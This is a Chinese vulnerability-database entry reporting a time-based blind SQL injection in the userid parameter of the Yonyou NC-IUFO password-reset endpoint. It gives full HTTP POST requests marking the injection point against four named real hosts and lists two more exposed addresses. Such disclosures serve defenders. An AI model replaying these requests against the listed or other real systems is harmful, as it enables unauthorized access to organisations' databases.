用友NC-IUFO系统通用SQL注入(三)

基本字段

漏洞编号：: SSV-93318

披露/发现时间：: 2015-01-13

提交时间：: 2015-01-13

漏洞等级：

漏洞类别：: 其他类型

影响组件：: YonYou

漏洞作者：: 路人甲

提交者：: Knownsec

CVE-ID：: 补充

CNNVD-ID：: 补充

CNVD-ID：: 补充

ZoomEye Dork：: 补充

来源

http://wooyun.org/bugs/wooyun-2015-091060

漏洞详情

贡献者 Knownsec 共获得 0KB

### 简要描述： ... ### 详细说明：该系统“忘记密码”模块存在sql注入漏洞链接地址为：/epp/core/forgetpwd.jsp?pageId=forgetpwd&rand=1234 [<img src="https://images.seebug.org/upload/201501/10164647850329b74ce2a803fc0de1dd767da668.png" alt="QQ图片20150110164630.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/10164647850329b74ce2a803fc0de1dd767da668.png) 说明：输入用户名和邮箱后提交，程序会提交给 /epp/core（可从抓取的数据包中看到），漏洞参数：userid 数据库系统：oracle 注入类型：AND/OR time-based blind 这里直接给出证明案例（列出数据库实例名称即可、不深入）： 0x01; http://nc.xhlbdc.com/epp/ ``` POST /epp/core HTTP/1.1 Host: nc.xhlbdc.com Proxy-Connection: keep-alive Content-Length: 107 Origin: http://nc.xhlbdc.com Method: POST /epp/core HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.131 Safari/537.36 Content-Type: application/x-www-form-urlencoded;charset=UTF-8 Accept: */* Referer: http://nc.xhlbdc.com/epp/core/forgetpwd.jsp?pageId=forgetpwd&rand=8438 Accept-Encoding: gzip,deflate,sdch Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,fr;q=0.4,ja;q=0.2,ko;q=0.2,ru;q=0.2,vi;q=0.2,zh-TW;q=0.2,es;q=0.2,th;q=0.2 Cookie: JSESSIONID=0000zdbG9i3ttIPJ7g2Ayl4KoRm:175j517sp userid=*&email=&type=forgetPWD&pageId=forgetpwd&pageUniqueId=177ef747-d34f-4076-b627-bf97720fbbdf&isAjax=1 ``` [<img src="https://images.seebug.org/upload/201501/10165621d9c4cb2ce4c8e58c932a8d0a2b7607fb.jpg" alt="QQ图片20150110165610.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/10165621d9c4cb2ce4c8e58c932a8d0a2b7607fb.jpg) 0x02: http://nc.pinggugroup.com:81/epp/ ``` POST /epp/core HTTP/1.1 Host: nc.pinggugroup.com:81 Proxy-Connection: keep-alive Content-Length: 111 Origin: http://nc.pinggugroup.com:81 Method: POST /epp/core HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.131 Safari/537.36 Content-Type: application/x-www-form-urlencoded;charset=UTF-8 Accept: */* Referer: http://nc.pinggugroup.com:81/epp/core/forgetpwd.jsp?pageId=forgetpwd&rand=7158 Accept-Encoding: gzip,deflate,sdch Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,fr;q=0.4,ja;q=0.2,ko;q=0.2,ru;q=0.2,vi;q=0.2,zh-TW;q=0.2,es;q=0.2,th;q=0.2 Cookie: JSESSIONID=0000ZPRlAAMZqeOX2_DUd6dPukK:-1 userid=*&email=aaaaa&type=forgetPWD&pageId=forgetpwd&pageUniqueId=ef251f23-ae34-4047-95f0-2f95f3085cf2&isAjax=1 ``` [<img src="https://images.seebug.org/upload/201501/101651300cd5259af6212d618c309048dacc85ad.jpg" alt="QQ图片20150110165121.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/101651300cd5259af6212d618c309048dacc85ad.jpg) 0x03: http://123.232.105.202/epp/ ``` POST /epp/core HTTP/1.1 Host: 123.232.105.202 Proxy-Connection: keep-alive Content-Length: 111 Origin: http://123.232.105.202 Method: POST /epp/core HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.131 Safari/537.36 Content-Type: application/x-www-form-urlencoded;charset=UTF-8 Accept: */* Referer: http://123.232.105.202/epp/core/forgetpwd.jsp?pageId=forgetpwd&rand=4522 Accept-Encoding: gzip,deflate,sdch Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,fr;q=0.4,ja;q=0.2,ko;q=0.2,ru;q=0.2,vi;q=0.2,zh-TW;q=0.2,es;q=0.2,th;q=0.2 Cookie: JSESSIONID=0000FoJ4EiDJNB9px4Q_Y3g01j9:-1 userid=*&email=aaaaa&type=forgetPWD&pageId=forgetpwd&pageUniqueId=a4004558-4d36-4b1e-a397-6b8217320613&isAjax=1 ``` [<img src="https://images.seebug.org/upload/201501/101719046d6d5130e7343471cb3ca73c2534f71f.jpg" alt="QQ图片20150110171850.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/101719046d6d5130e7343471cb3ca73c2534f71f.jpg) 0x04: http://zfkg.com:8081/epp/ ``` POST /epp/core HTTP/1.1 Host: zfkg.com:8081 Proxy-Connection: keep-alive Content-Length: 110 Origin: http://zfkg.com:8081 Method: POST /epp/core HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.131 Safari/537.36 Content-Type: application/x-www-form-urlencoded;charset=UTF-8 Accept: */* Referer: http://zfkg.com:8081/epp/core/forgetpwd.jsp?pageId=forgetpwd&rand=1234 Accept-Encoding: gzip,deflate,sdch Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,fr;q=0.4,ja;q=0.2,ko;q=0.2,ru;q=0.2,vi;q=0.2,zh-TW;q=0.2,es;q=0.2,th;q=0.2 Cookie: JSESSIONID=843FB4AB3D3B82DDDC089308B9A97A23.server; JSESSIONID=9F6DE9B77CB36498D032BE46B92A6C54.server userid=*&email=aaaa&type=forgetPWD&pageUniqueId=78c7cfa2-6909-4ee5-b72b-3098364a5369&pageId=forgetpwd&isAjax=1 ``` [<img src="https://images.seebug.org/upload/201501/10171737aa5093ace895dbdc1c9f44687ef8eb2f.jpg" alt="QQ图片20150110171723.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/10171737aa5093ace895dbdc1c9f44687ef8eb2f.jpg) http://202.136.213.21/epp/core/forgetpwd.jsp?pageId=forgetpwd&rand=1234 http://61.175.97.50//epp/core/forgetpwd.jsp?pageId=forgetpwd&rand=1234 ### 漏洞证明：

共 0 兑换了

PoC

暂无 PoC

参考链接

http://wooyun.org/bugs/wooyun-2015-091060

解决方案

临时解决方案

暂无临时解决方案

官方解决方案

暂无官方解决方案

防护方案

暂无防护方案

※本站提供的任何内容、代码与服务仅供学习，请勿用于非法用途，否则后果自负

基本字段

来源

漏洞详情

PoC

参考链接

解决方案

生命线

相关漏洞

评论前需绑定手机现在绑定

暂无评论

用友NC-IUFO系统通用SQL注入(三)

基本字段

来源

漏洞详情

PoC

参考链接

解决方案

生命线

相关漏洞

评论前需绑定手机 现在绑定

暂无评论

您好，

您好，

评论前需绑定手机现在绑定